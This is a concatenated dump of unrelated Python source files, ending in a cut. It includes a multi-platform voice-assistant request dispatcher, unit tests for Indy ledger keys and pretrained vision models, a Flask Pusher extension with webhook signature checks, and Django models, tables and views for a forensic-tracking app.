raise NotImplementedError
class InoftHandlersGroup:
@abstractmethod
def __getattr__(self, item):
self_vars = vars(self)
if item in self_vars:
return self_vars[item]
else:
return DummyObject()
def handle(self) -> dict:
for var_key, var_object in vars(self).items():
if InoftRequestHandler in list(var_object.__class__.__bases__):
if var_object.can_handle() is True:
handler_output = var_object.handle()
if handler_output is not None:
return handler_output
class InoftSkill:
APP_SETTINGS: Settings
def __init__(self, settings_instance: Settings = None):
self.settings = settings_instance
self.plugins = plugins_load(settings=self.settings)
# todo: reactivate plugins
InoftSkill.APP_SETTINGS = self.settings
self._request_handlers_chain = dict()
self._state_handlers_chain = dict()
self._default_fallback_handler = None
self._handler_input = HandlerInput(settings_instance=settings_instance)
self.on_interaction_start: List[Callable[[], Any]] = []
self.on_interaction_end: List[Callable[[], Any]] = []
self.settings.user_data_plugin.register_plugin(skill=self)
# todo: add better plugin registration system
@property
def settings(self) -> Settings:
return self._settings
@settings.setter
def settings(self, settings: Settings) -> None:
raise_if_variable_not_expected_type(value=settings, expected_type=Settings, variable_name="settings")
self._settings = settings
def add_request_handler(self, request_handler_instance_or_class) -> None:
if request_handler_instance_or_class is not None:
try:
if isinstance(request_handler_instance_or_class, type):
# If the variable is a class object we create an instance of the class
handler_bases_parent_classes = request_handler_instance_or_class.__bases__
request_handler_instance_or_class = request_handler_instance_or_class()
else:
# If the variable is a class instance
handler_bases_parent_classes = request_handler_instance_or_class.__class__.__bases__
if InoftRequestHandler in handler_bases_parent_classes:
request_handler_instance_or_class.handler_input = self.handler_input
# We set a reference to the skill handler_input in each handler so that it can use it with its HandlerInputWrapper
self.request_handlers_chain[request_handler_instance_or_class.__class__.__name__] = request_handler_instance_or_class
except Exception as e:
raise Exception(f"Error while adding a request handler. Please make sure it is a {InoftRequestHandler} class object : {e}")
else:
raise Exception(f"The following request handler is not a valid handler or do not have "
f"{InoftRequestHandler.__name__} as its MetaClass : {request_handler_instance_or_class}")
def add_state_handler(self, state_handler_instance_or_class) -> None:
if state_handler_instance_or_class is not None:
try:
if isinstance(state_handler_instance_or_class, type):
# If the variable is a class object we create an instance of the class
handler_bases_parent_classes = state_handler_instance_or_class.__bases__
state_handler_instance_or_class = state_handler_instance_or_class()
else:
# If the variable is a class instance
handler_bases_parent_classes = state_handler_instance_or_class.__class__.__bases__
if InoftStateHandler in handler_bases_parent_classes:
state_handler_instance_or_class.handler_input = self.handler_input
# We set a reference to the skill handler_input in each handler so that it can use it with its HandlerInputWrapper
self.state_handlers_chain[state_handler_instance_or_class.__class__.__name__] = state_handler_instance_or_class
except Exception as e:
raise Exception(f"Error while adding a state handler. Please make sure it is a {InoftStateHandler} class object : {e}")
else:
raise Exception(f"The following state handler is not a valid handler or do not have "
f"{InoftStateHandler.__name__} as its MetaClass : {state_handler_instance_or_class}")
def set_default_fallback_handler(self, default_fallback_handler_instance_or_class) -> None:
if default_fallback_handler_instance_or_class is not None:
try:
if isinstance(default_fallback_handler_instance_or_class, type):
# If the variable is a class object we create an instance of the class
handler_bases_parent_classes = default_fallback_handler_instance_or_class.__bases__
default_fallback_handler_instance_or_class = default_fallback_handler_instance_or_class()
else:
# If the variable is a class instance
handler_bases_parent_classes = default_fallback_handler_instance_or_class.__class__.__bases__
if InoftDefaultFallback in handler_bases_parent_classes:
default_fallback_handler_instance_or_class.handler_input = self.handler_input
# We set a reference to the skill handler_input in each handler so that it can use it with its HandlerInputWrapper
self.default_fallback_handler = default_fallback_handler_instance_or_class
except Exception as e:
raise Exception(f"Error while adding a request handler. Please make sure it is a {InoftDefaultFallback} class object : {e}")
else:
raise Exception(f"The following fallback handler is not a valid handler or do not have "
f"{InoftDefaultFallback.__name__} as its MetaClass : {default_fallback_handler_instance_or_class}")
def process_request(self):
output_event = None
handler_to_use = None
handler_is_an_alone_callback_function = False
handler_is_an_audioplayer_handlers_group = False
handler_is_a_then_state_handler = False
handler_is_a_request_handler = False
# If an UPDATES_USER_ID has been found on the Google Assistant Platform, we saved it in the user data.
if self.handler_input.is_dialogflow is True:
current_updates_user_id = self.handler_input.dialogFlowHandlerInput.request.get_updates_user_id_if_present()
if current_updates_user_id is not None:
remembered_updates_user_id = self.handler_input.persistent_remember("updatesUserId", str)
if current_updates_user_id != remembered_updates_user_id:
self.handler_input.persistent_memorize("updatesUserId", current_updates_user_id)
# Steps of priority
# Discord override
if self.handler_input.is_discord is True:
if not len(self.request_handlers_chain) > 0:
raise Exception(f"No request handlers have been found !!!!!")
else:
handler_to_use = list(self.request_handlers_chain.values())[0]
# First, if the request is an interactive option made by the user
if self.handler_input.need_to_be_handled_by_callback():
infos_callback_function_to_use = self.handler_input.interactivity_callback_functions.get(
self.handler_input.selected_option_identifier
).to_safedict(default=None)
if infos_callback_function_to_use is not None:
from inoft_vocal_framework.skill_builder import get_function_or_class_from_file_and_path
handler_to_use = get_function_or_class_from_file_and_path(
file_filepath=infos_callback_function_to_use.get("file_filepath_containing_callback").to_str(),
path_qualname=infos_callback_function_to_use.get("callback_function_path").to_str())
if handler_to_use is not None:
handler_is_an_alone_callback_function = True
# Second, Alexa Audio Player
if self.handler_input.is_alexa:
if (
self.handler_input.alexaHandlerInput.context.audioPlayer is not None and
self.handler_input.alexaHandlerInput.context.audioPlayer.token is not None
):
last_used_audioplayer_handlers_group_infos = self.handler_input.alexaHandlerInput.get_last_used_audioplayer_handlers_group()
from inoft_vocal_framework.skill_builder import get_function_or_class_from_file_and_path
audioplayer_handlers_group_class_type = get_function_or_class_from_file_and_path(
file_filepath=last_used_audioplayer_handlers_group_infos.get("fileFilepathContainingClass").to_str(),
path_qualname=last_used_audioplayer_handlers_group_infos.get("classPath").to_str())
if audioplayer_handlers_group_class_type is not None:
raise_if_value_not_in_list(value=InoftHandlersGroup, list_object=list(audioplayer_handlers_group_class_type.__bases__),
variable_name="audioplayer_handlers_group_class_type")
class_kwargs = last_used_audioplayer_handlers_group_infos.get("classKwargs").to_dict()
class_kwargs["parent_handler"] = self
handler_to_use = audioplayer_handlers_group_class_type(**class_kwargs)
# When using an audioplayer handlers group, we will call its handle function (it will try every one of its
# handler, until he found one that return an output). If the output is None (no function out of every function
# of the audioplayer handlers group has returned something), then we will set back the handler_to_use to None,
# so that the others more traditional handlers can have a chance to be use (if we did not do that, and that
# no event was returned, the response would be the default fallback right away).
# The reason we do all of that, is that if the AudioPlayer object is present, but not in a state that is
# supported by the app trough a can_handle function (like if it is stopped, and no can_handle function of
# any class is triggered by the current state of the AudioPlayer), then we will not be able to give an
# interactive experience with the AudioPlayer, which translate into our output_event being None.
output_event = handler_to_use.handle()
if output_event is not None:
handler_is_an_audioplayer_handlers_group = True
else:
handler_to_use = None
# Third, if the invocation is a new session, and a session can be resumed, we resume the last intent of the previous session
if self.handler_input.is_invocation_new_session is True and self.handler_input.session_been_resumed is True:
last_intent_handler_class_key_name: Optional[str] = self.handler_input.user_data.get_field(field_path='lastIntentHandler')
if last_intent_handler_class_key_name in self.request_handlers_chain.keys():
handler_to_use = self.request_handlers_chain[last_intent_handler_class_key_name]
elif last_intent_handler_class_key_name in self.state_handlers_chain.keys():
handler_to_use = self.state_handlers_chain[last_intent_handler_class_key_name]
# Fourth, loading of the then_state in the session
if handler_to_use is None:
last_then_state_class_name = self.handler_input.remember_session_then_state()
if last_then_state_class_name is not None:
if last_then_state_class_name in self.state_handlers_chain.keys():
handler_to_use = self.state_handlers_chain[last_then_state_class_name]
handler_is_a_then_state_handler = True
self.handler_input.forget_session_then_state()
else:
logging.warning(f"A thenState class name ({last_then_state_class_name}) was not None and has"
f" not been found in the available classes : {self.state_handlers_chain}")
# Fifth, classical requests handlers
if handler_to_use is None:
for request_handler in self.request_handlers_chain.values():
if request_handler.can_handle() is True:
handler_to_use = request_handler
handler_is_a_request_handler = True
break
else:
logging.debug(f"Not handled by : {request_handler.__class__}")
if handler_to_use is not None:
if handler_is_an_alone_callback_function is True:
output_event = handler_to_use(self.handler_input, self.handler_input.selected_option_identifier)
if output_event is not None:
logging.debug(f"Successfully resumed by {handler_to_use} which returned {output_event}")
else:
logging.info(f"A callback function has been found {handler_to_use}. But nothing was returned,"
f" did you called the return self.to_platform_dict() function ?")
if output_event is None and self.handler_input.session_been_resumed is True:
logging.debug(f"Handled and resumed by : {handler_to_use.__class__}")
output_event = handler_to_use.handle_resume()
if output_event is None:
logging.debug(f"Handled classically by : {handler_to_use.__class__}")
output_event = handler_to_use.handle()
if handler_is_a_then_state_handler is True and output_event is None:
# If the handle function of the a then_state handler do not return anything, we call its fallback
# function, and we set back the then_state to the session attributes (we do so before calling
# the fallback, in case the fallback function changed the then_state)
self.handler_input.memorize_session_then_state(state_handler_class_type_or_name=last_then_state_class_name)
output_event = handler_to_use.fallback()
if output_event is not None:
if handler_is_an_alone_callback_function is False and handler_is_an_audioplayer_handlers_group is False:
# If the response is handled by a function, we do not save it as the last intent (we cannot actually,
# and it would not make sense anyway). So we will keep the previous last intent as the new last intent.
# We do the same thing it is handler by an audioplayer handlers group (since it is used to handle interactions too)
self.handler_input.memorize_session_last_intent_handler(handler_class_type_instance_name=handler_to_use)
else:
logging.debug(f"Handler by default fallback : {self.default_fallback_handler}")
output_event = self.default_fallback_handler.handle()
for callback in self.on_interaction_end:
callback()
if self.handler_input.is_discord is not True:
print(f"output_event = {output_event}")
wrapped_output_event = LambdaResponseWrapper(response_dict=output_event).get_wrapped(handler_input=self.handler_input)
return wrapped_output_event
else:
return None
def check_everything_implemented(self):
if self.default_fallback_handler is None:
raise Exception(f"A skill must have a {InoftDefaultFallback} handler set with the {self.set_default_fallback_handler} function.")
@staticmethod
def _get_alexa_application_id_from_event(event: dict) -> Optional[str]:
context: Optional[dict] = event.get('context', None)
if context is not None:
system: Optional[dict] = context.get('System', None)
if system is not None:
application: Optional[dict] = system.get('application', None)
if application is not None:
return application.get('applicationId', None)
return None
def handle_any_platform(self, event: dict, context: dict):
from inoft_vocal_framework.platforms_handlers.discord.handler_input import DiscordHandlerInput
print(f"Crude event = {event if not isinstance(event, dict) else json_dumps(event)}\nCrude context = {context}")
self.check_everything_implemented()
# The 'rawPath' is for ApiGatewayV2, use the key 'resource' (without the comma) if using ApiGatewayV1
event_raw_path: Optional[str] = event.get('rawPath', None)
if event_raw_path == '/googleAssistantDialogflowV1':
# A google-assistant or dialogflow request always pass trough an API gateway
self.handler_input.set_platform_to_dialogflow()
event_body: Optional[dict or str] = event.get('body', None)
if event_body is None:
raise Exception("Event body not found")
event: dict = event_body if isinstance(event_body, dict) else json.loads(event_body)
print(f"Event body for Google Assistant = {json_dumps(event)}")
elif event_raw_path == "/samsungBixbyV1":
# A samsung bixby request always pass trough an API gateway
self.handler_input.set_platform_to_bixby()
event_body: Optional[dict] = event.get('body', None)
if event_body is None:
raise Exception("Event body not found")
from urllib import parse
event_raw_query_string: Optional[str] = event.get('rawQueryString', None)
parameters: dict = dict(parse.parse_qsl(event_raw_query_string)) if event_raw_query_string is not None else {}
event = {'context': event_body.get('$vivContext'), 'parameters': parameters}
print(f"Event body for Samsung Bixby = {json_dumps(event)}")
elif "amzn1." in (self._get_alexa_application_id_from_event(event=event) or ""):
# Alexa always go last, since it do not pass trough an api resource, its a less robust identification than the other platforms.
self.handler_input.set_platform_to_alexa()
print(f"Event body do not need processing for Alexa : {event}")
elif DiscordHandlerInput.SHOULD_BE_USED is True:
self.handler_input.set_platform_to_discord()
print(f"Event body do not need processing for Discord : {event}")
else:
from inoft_vocal_framework.messages import ERROR_PLATFORM_NOT_SUPPORTED
raise Exception(ERROR_PLATFORM_NOT_SUPPORTED)
self.handler_input.load_event(event=event)
return self.process_request()
@property
def request_handlers_chain(self) -> dict:
return self._request_handlers_chain
@property
def state_handlers_chain(self) -> dict:
return self._state_handlers_chain
@property
def default_fallback_handler(self):
return self._default_fallback_handler
@default_fallback_handler.setter
def default_fallback_handler(self, default_fallback_handler) -> None:
self._default_fallback_handler = default_fallback_handler
@property
def handler_input(self) -> HandlerInput:
return self._handler_input
@property
def default_session_data_timeout(self):
return self._handler_input.default_session_data_timeout
@default_session_data_timeout.setter
def default_session_data_timeout(self, default_session_data_timeout: int) -> None:
if not isinstance(default_session_data_timeout, int):
raise Exception(f"default_session_data_timeout was type {type(default_session_data_timeout)} which is not valid value for his parameter.")
self.handler_input._default_session_data_timeout = default_session_data_timeout
|
1708753
|
from abc import ABCMeta, abstractmethod
class Goal:
__metaclass__ = ABCMeta
INACTIVE = 0
ACTIVE = 1
COMPLETED = 2
FAILED = 3
def __init__(self, owner):
self.owner = owner
self.status = self.INACTIVE
@abstractmethod
def activate(self):
pass
@abstractmethod
def process(self):
pass
@abstractmethod
def terminate(self):
pass
def handleMessage(self, msg):
return False
def add_subgoal(self, goal):
raise NotImplementedError('Cannot add goals to atomic goals')
def reactivateIfFailed(self):
if self.status == self.FAILED:
self.status = self.INACTIVE
def activateIfInactive(self):
if self.status == self.INACTIVE:
self.status = self.ACTIVE
|
1708769
|
from __future__ import absolute_import
from .._hook import import_hook
@import_hook(__name__)
def value_processor(name, raw_name, raw_value):
import json
try:
value = json.loads(raw_value)
except ValueError:
error_msg = (
'{0}={1!r} found but {1!r} is not a valid json value.\n\n'
'You may want {0}=\'"{1}"\' if the value should be a string.')
raise ImportError(error_msg.format(raw_name, raw_value))
return value
del import_hook
del value_processor
|
1708823
|
from configparser import ConfigParser
import os, sys
from ant.core import log
from BtAtsPowerCalculator import BtAtsPowerCalculator
from CycleOpsFluid2PowerCalculator import CycleOpsFluid2PowerCalculator
from EliteNovoForceS3PowerCalculator import EliteNovoForceS3PowerCalculator
from GenericFluidPowerCalculator import GenericFluidPowerCalculator
from GenericMagneticPowerCalculator import GenericMagneticPowerCalculator
from KurtKineticPowerCalculator import KurtKineticPowerCalculator
from LinearInterpolationPowerCalculator import LinearInterpolationPowerCalculator
from TacxBlueMotionPowerCalculator import TacxBlueMotionPowerCalculator
from constants import *
import hashlib
if getattr(sys, 'frozen', False):
# If we're running as a pyinstaller bundle
SCRIPT_DIR = os.path.dirname(sys.executable)
else:
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
VPOWER_DEBUG = False
# ANT+ ID of the virtual power sensor
# The expression below will choose a fixed ID based on the CPU's serial number
POWER_SENSOR_ID = int(int(hashlib.md5(getserial().encode()).hexdigest(), 16) & 0xfffe) + 1
# Set to None to disable ANT+ message logging
LOG = None
# LOG = log.LogWriter(filename="vpower.log")
# ANT+ network key
NETKEY = b'\<KEY>'
if LOG:
print("Using log file:", LOG.filename)
print("")
_CONFIG_FILENAME = os.path.join(SCRIPT_DIR, 'vpower.cfg')
if os.path.isfile(_CONFIG_FILENAME):
CONFIG = ConfigParser()
SECTION = 'vpower'
if VPOWER_DEBUG: print('Read config file')
CONFIG.read(_CONFIG_FILENAME)
if VPOWER_DEBUG: print('Get config items')
# Type of sensor connected to the trainer
SENSOR_TYPE = CONFIG.getint(SECTION, 'speed_sensor_type')
# ANT+ ID of the above sensor
SPEED_SENSOR_ID = CONFIG.getint(SECTION, 'speed_sensor_id')
# Calculator for the model of turbo
pc_class = globals()[CONFIG.get(SECTION, 'power_calculator')]
POWER_CALCULATOR = pc_class()
# For wind/air trainers, current air density in kg/m3 (if not using a BME280 weather sensor)
POWER_CALCULATOR.air_density = CONFIG.getfloat(SECTION, 'air_density')
# For wind/air trainers, how often (secs) to update the air density if there *is* a BME280 present
POWER_CALCULATOR.air_density_update_secs = CONFIG.getfloat(SECTION, 'air_density_update_secs')
# For tyre-driven trainers, the wheel circumference in meters (2.122 for Continental Home trainer tyre)
POWER_CALCULATOR.wheel_circumference = CONFIG.getfloat(SECTION, 'wheel_circumference')
# Overall correction factor, e.g. to match a user's power meter on another bike
POWER_CALCULATOR.set_correction_factor(CONFIG.getfloat(SECTION, 'correction_factor'))
# If set to True, the stick's driver will dump everything it reads/writes from/to the stick.
DEBUG = CONFIG.getboolean(SECTION, 'debug')
else:
if VPOWER_DEBUG: print('Config file not found, using default values')
SENSOR_TYPE = 123
SPEED_SENSOR_ID = 0
POWER_CALCULATOR = LinearInterpolationPowerCalculator()
POWER_CALCULATOR.air_density = 1.191
POWER_CALCULATOR.air_density_update_secs = 10
POWER_CALCULATOR.wheel_circumference = 2.105
POWER_CALCULATOR.set_correction_factor(1.0)
DEBUG = VPOWER_DEBUG
POWER_CALCULATOR.set_debug(DEBUG)
|
1708830
|
class IDisposable:
""" Defines a method to release allocated resources. """
def Dispose(self):
"""
Dispose(self: IDisposable)
Performs application-defined tasks associated with freeing,releasing,or resetting unmanaged
resources.
"""
pass
def __enter__(self,*args):
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self,*args):
"""
__exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
|
1708831
|
from indy_node.test.did.conftest import nym_get
from indy_node.test.helper import sdk_rotate_verkey
def testAddDidWithoutAVerkey(nym_empty_vk):
pass
def testRetrieveEmptyVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
nwh, ndid = nym_empty_vk
resp_data = nym_get(looper, sdk_pool_handle, sdk_wallet_trustee, ndid)
assert ndid == resp_data[0]
assert not resp_data[1]
def testChangeEmptyVerkeyToNewVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
_, did = nym_empty_vk
trw, trd = sdk_wallet_trustee
new_vk = sdk_rotate_verkey(looper, sdk_pool_handle, trw, trd, did)
assert new_vk
def testRetrieveChangedVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
_, did = nym_empty_vk
trw, trd = sdk_wallet_trustee
new_vk = sdk_rotate_verkey(looper, sdk_pool_handle, trw, trd, did)
resp_data = nym_get(looper, sdk_pool_handle, sdk_wallet_trustee, did)
assert did == resp_data[0]
assert new_vk == resp_data[1]
def testVerifySigWithChangedVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
wh, did = nym_empty_vk
trw, trd = sdk_wallet_trustee
new_vk = sdk_rotate_verkey(looper, sdk_pool_handle, trw, trd, did)
# check sign by getting nym from ledger - if succ then sign is ok
resp_data = nym_get(looper, sdk_pool_handle, (wh, did), did)
assert did == resp_data[0]
assert new_vk == resp_data[1]
|
1708858
|
import unittest
import super_gradients
from super_gradients.training import MultiGPUMode
from super_gradients.training import SgModel
from super_gradients.training.datasets.dataset_interfaces.dataset_interface import ClassificationTestDatasetInterface
from super_gradients.training.metrics import Accuracy
import os
import shutil
class PretrainedModelsUnitTest(unittest.TestCase):
def setUp(self) -> None:
super_gradients.init_trainer()
self.imagenet_pretrained_models = ["resnet50", "repvgg_a0", "regnetY800"]
self.test_dataset = ClassificationTestDatasetInterface(classes=range(1000))
def test_pretrained_resnet50_imagenet(self):
trainer = SgModel('imagenet_pretrained_resnet50_unit_test', model_checkpoints_location='local',
multi_gpu=MultiGPUMode.OFF)
trainer.connect_dataset_interface(self.test_dataset, data_loader_num_workers=8)
trainer.build_model("resnet50", checkpoint_params={"pretrained_weights": "imagenet"})
trainer.test(test_loader=self.test_dataset.val_loader, test_metrics_list=[Accuracy()],
metrics_progress_verbose=True)
def test_pretrained_regnetY800_imagenet(self):
trainer = SgModel('imagenet_pretrained_regnetY800_unit_test', model_checkpoints_location='local',
multi_gpu=MultiGPUMode.OFF)
trainer.connect_dataset_interface(self.test_dataset, data_loader_num_workers=8)
trainer.build_model("regnetY800", checkpoint_params={"pretrained_weights": "imagenet"})
trainer.test(test_loader=self.test_dataset.val_loader, test_metrics_list=[Accuracy()],
metrics_progress_verbose=True)
def test_pretrained_repvgg_a0_imagenet(self):
trainer = SgModel('imagenet_pretrained_repvgg_a0_unit_test', model_checkpoints_location='local',
multi_gpu=MultiGPUMode.OFF)
trainer.connect_dataset_interface(self.test_dataset, data_loader_num_workers=8)
trainer.build_model("repvgg_a0", checkpoint_params={"pretrained_weights": "imagenet"},
arch_params={"build_residual_branches": True})
trainer.test(test_loader=self.test_dataset.val_loader, test_metrics_list=[Accuracy()],
metrics_progress_verbose=True)
def tearDown(self) -> None:
if os.path.exists('~/.cache/torch/hub/'):
shutil.rmtree('~/.cache/torch/hub/')
if __name__ == '__main__':
unittest.main()
|
1708864
|
from flask import Blueprint, current_app, request, abort, json
import pusher as _pusher
from pusher.signature import sign, verify
try:
import flask_jsonpify
except ImportError: # pragma: no cover
from flask import jsonify
else:
jsonify = flask_jsonpify.jsonify
flask_jsonpify__dumps = flask_jsonpify.__dumps
def __dumps(*args, **kwargs):
indent = None
if current_app.config.get('JSONIFY_PRETTYPRINT_REGULAR', False):
indent = 2
return json.dumps(
args[0] if len(args) is 1 else dict(*args, **kwargs),
indent=indent
)
flask_jsonpify.__dumps = __dumps
class _Pusher(_pusher.Pusher):
"""
Pusher client wrapper to get attributes from `_pusher_client`
if the attribute does not exist.
Provide backward compatibility to `pusher>=1.6`.
"""
def __getattr__(self, attr):
client = self._pusher_client
return getattr(client, attr)
class Pusher(object):
def __init__(self, app=None, url_prefix="/pusher"):
self.app = app
self._auth_handler = None
self._channel_data_handler = None
self._blueprint = Blueprint('pusher', __name__, url_prefix=url_prefix)
self.webhooks = Webhooks(self)
if app is not None:
self.init_app(app)
def init_app(self, app):
# if config not defined, Pusher will fallback to default config
app.config.setdefault("PUSHER_APP_ID", '')
app.config.setdefault("PUSHER_KEY", '')
app.config.setdefault("PUSHER_SECRET", '')
app.config.setdefault("PUSHER_HOST", '')
app.config.setdefault("PUSHER_PORT", '')
app.config.setdefault("PUSHER_AUTH", '/auth')
pusher_kwargs = dict(
app_id=app.config["PUSHER_APP_ID"],
key=app.config["PUSHER_KEY"],
secret=app.config["PUSHER_SECRET"],
host=app.config["PUSHER_HOST"],
port=app.config["PUSHER_PORT"],
)
ssl = app.config.get('PUSHER_SSL')
if ssl is not None:
pusher_kwargs["ssl"] = ssl
timeout = app.config.get('PUSHER_TIMEOUT')
if timeout is not None:
pusher_kwargs["timeout"] = timeout
cluster = app.config.get('PUSHER_CLUSTER')
if cluster is not None:
pusher_kwargs["cluster"] = cluster
backend = app.config.get('PUSHER_BACKEND')
if backend is not None:
pusher_kwargs["backend"] = backend
notification_host = app.config.get('PUSHER_NOTIFICATION_HOST')
if notification_host is not None:
pusher_kwargs["notification_host"] = notification_host
notification_ssl = app.config.get('PUSHER_NOTIFICATION_SSL')
if notification_ssl is not None:
pusher_kwargs["notification_ssl"] = notification_ssl
encryption_master_key = app.config.get('PUSHER_ENCRYPTION_MASTER_KEY')
if encryption_master_key is not None:
pusher_kwargs["encryption_master_key"] = encryption_master_key
pusher_kwargs.update({
"json_encoder": getattr(app, "json_encoder", None),
"json_decoder": getattr(app, "json_decoder", None),
})
backend_options = app.config.get('PUSHER_BACKEND_OPTIONS')
if backend_options is not None:
pusher_kwargs.update(backend_options)
client = _Pusher(**pusher_kwargs)
self._make_blueprint(app.config["PUSHER_AUTH"])
app.register_blueprint(self._blueprint)
if not hasattr(app, "extensions"):
app.extensions = {}
app.extensions["pusher"] = client
@property
def client(self):
return current_app.extensions.get("pusher")
def auth(self, handler):
self._auth_handler = handler
return handler
def channel_data(self, handler):
self._channel_data_handler = handler
return handler
def _make_blueprint(self, auth_path):
bp = self._blueprint
@bp.route(auth_path, methods=["POST"])
def auth():
if not self._auth_handler:
abort(403)
socket_id = request.form["socket_id"]
channel_name = request.form.get("channel_name")
if channel_name:
response = self._auth_simple(socket_id, channel_name)
if not response:
abort(403)
else:
response = self._auth_buffered(socket_id)
return jsonify(response)
@bp.app_context_processor
def pusher_data():
return {
"PUSHER_KEY": self.client.key
}
def _sign(self, message):
return sign(self.client.secret, message)
def _verify(self, message, signature):
if not signature:
return False
return verify(self.client.secret, message, signature)
def _auth_simple(self, socket_id, channel_name):
if not self._auth_handler(channel_name, socket_id):
return None
return self._auth_key(socket_id, channel_name)
def _auth_buffered(self, socket_id):
response = {}
while True:
n = len(response)
channel_name = request.form.get("channel_name[%d]" % n)
if not channel_name:
if n == 0:
# it is not a buffered request
abort(400)
break
r = {}
auth = self._auth_simple(socket_id, channel_name)
if auth:
r.update(status=200, data=auth)
else:
r.update(status=403)
response[channel_name] = r
return response
def _auth_key(self, socket_id, channel_name):
if channel_name.startswith("presence-"):
channel_data = {"user_id": socket_id}
if self._channel_data_handler:
d = self._channel_data_handler(channel_name, socket_id)
channel_data.update(d)
auth_args = [socket_id, channel_data]
elif channel_name.startswith("private-"):
auth_args = [socket_id]
else:
# must never happen, this request is not from pusher
abort(404)
return self.client.authenticate(channel_name, *auth_args)
class Webhooks(object):
CHANNEL_EXISTENCE_EVENT = "channel_existence"
PRESENCE_EVENT = "presence"
CLIENT_EVENT = "client"
def __init__(self, pusher):
self.pusher = pusher
self._handlers = {}
self._register(self.CHANNEL_EXISTENCE_EVENT)
self._register(self.PRESENCE_EVENT)
self._register(self.CLIENT_EVENT)
def channel_existence(self, func):
self._handlers[self.CHANNEL_EXISTENCE_EVENT] = func
return func
def presence(self, func):
self._handlers[self.PRESENCE_EVENT] = func
return func
def client(self, func):
self._handlers[self.CLIENT_EVENT] = func
return func
def _register(self, event):
def route():
func = self._handlers.get(event)
if not func:
abort(404)
self._validate()
func()
return "OK", 200
rule = "/events/%s" % event
name = "%s_event" % event
self.pusher._blueprint.add_url_rule(rule, name, route,
methods=["POST"])
def _validate(self):
pusher_key = request.headers.get("X-Pusher-Key")
if pusher_key != self.pusher.client.key:
# invalid pusher key
abort(403)
webhook_signature = request.headers.get("X-Pusher-Signature")
if not self.pusher._verify(request.data.decode(), webhook_signature):
# invalid signature
abort(403)
|
1708866
|
from django.db import models
from django.contrib.auth.models import User
class Project(models.Model):
name = models.CharField(max_length=128)
description = models.TextField(default="", blank=True)
members = models.ManyToManyField(User, through="Membership")
created_by = models.ForeignKey(User, on_delete=models.CASCADE, related_name="owner")
def get_absolute_url(self):
return reverse("project_detail", kwargs={"pk": self.pk})
class Membership(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
project = models.ForeignKey(Project, on_delete=models.CASCADE)
class Issue(models.Model):
name = models.CharField(max_length=128)
description = models.TextField(default="", blank=True)
assigned_to = models.ForeignKey(
User,
on_delete=models.SET_NULL,
null=True,
blank=True,
related_name="issues_assigned",
)
created_by = models.ForeignKey(
User, on_delete=models.CASCADE, related_name="issues_created"
)
|
1708869
|
from django.contrib.auth.models import User
from django_tables2 import tables, TemplateColumn
class UserByObjectTable(tables.Table):
actions = TemplateColumn(template_name='custom_columns/user_by_group_actions.html', orderable=False)
role = TemplateColumn(template_name='custom_columns/role_object.html', orderable=False)
class Meta:
model = User
attrs = {"id": "user_by_team_table", "class": "table squest-pagination-tables "}
fields = ("username", "email", "role", "actions")
|
1708877
|
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect, render
from django.urls import reverse
from django.views.generic import DetailView, ListView
from django.views.generic.edit import CreateView, UpdateView
from dfirtrack_main.forms import DomainuserForm
from dfirtrack_main.logger.default_logger import debug_logger
from dfirtrack_main.models import Domainuser
class DomainuserList(LoginRequiredMixin, ListView):
login_url = '/login'
model = Domainuser
template_name = 'dfirtrack_main/domainuser/domainuser_list.html'
context_object_name = 'domainuser_list'
def get_queryset(self):
debug_logger(str(self.request.user), " DOMAINUSER_LIST_ENTERED")
return Domainuser.objects.order_by('domainuser_name')
class DomainuserDetail(LoginRequiredMixin, DetailView):
login_url = '/login'
model = Domainuser
template_name = 'dfirtrack_main/domainuser/domainuser_detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
domainuser = self.object
domainuser.logger(str(self.request.user), " DOMAINUSER_DETAIL_ENTERED")
return context
class DomainuserCreate(LoginRequiredMixin, CreateView):
login_url = '/login'
model = Domainuser
form_class = DomainuserForm
template_name = 'dfirtrack_main/generic_form.html'
def get(self, request, *args, **kwargs):
form = self.form_class()
debug_logger(str(request.user), " DOMAINUSER_ADD_ENTERED")
return render(
request,
self.template_name,
{
'form': form,
'title': 'Add',
'object_type': 'domainuser',
},
)
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST)
if form.is_valid():
domainuser = form.save(commit=False)
domainuser.save()
form.save_m2m()
domainuser.logger(str(request.user), " DOMAINUSER_ADD_EXECUTED")
messages.success(request, 'Domainuser added')
return redirect(
reverse('domainuser_detail', args=(domainuser.domainuser_id,))
)
else:
return render(
request,
self.template_name,
{
'form': form,
'title': 'Add',
'object_type': 'domainuser',
},
)
class DomainuserUpdate(LoginRequiredMixin, UpdateView):
login_url = '/login'
model = Domainuser
form_class = DomainuserForm
template_name = 'dfirtrack_main/generic_form.html'
def get(self, request, *args, **kwargs):
domainuser = self.get_object()
form = self.form_class(instance=domainuser)
domainuser.logger(str(request.user), " DOMAINUSER_EDIT_ENTERED")
return render(
request,
self.template_name,
{
'form': form,
'title': 'Edit',
'object_type': 'domainuser',
'object_name': domainuser.domainuser_name,
},
)
def post(self, request, *args, **kwargs):
domainuser = self.get_object()
form = self.form_class(request.POST, instance=domainuser)
if form.is_valid():
domainuser = form.save(commit=False)
domainuser.save()
form.save_m2m()
domainuser.logger(str(request.user), " DOMAINUSER_EDIT_EXECUTED")
messages.success(request, 'Domainuser edited')
return redirect(
reverse('domainuser_detail', args=(domainuser.domainuser_id,))
)
else:
return render(
request,
self.template_name,
{
'form': form,
'title': 'Edit',
'object_type': 'domainuser',
'object_name': domainuser.domainuser_name,
},
)
|
1708906
|
import sys
import math
import numpy as np
try:
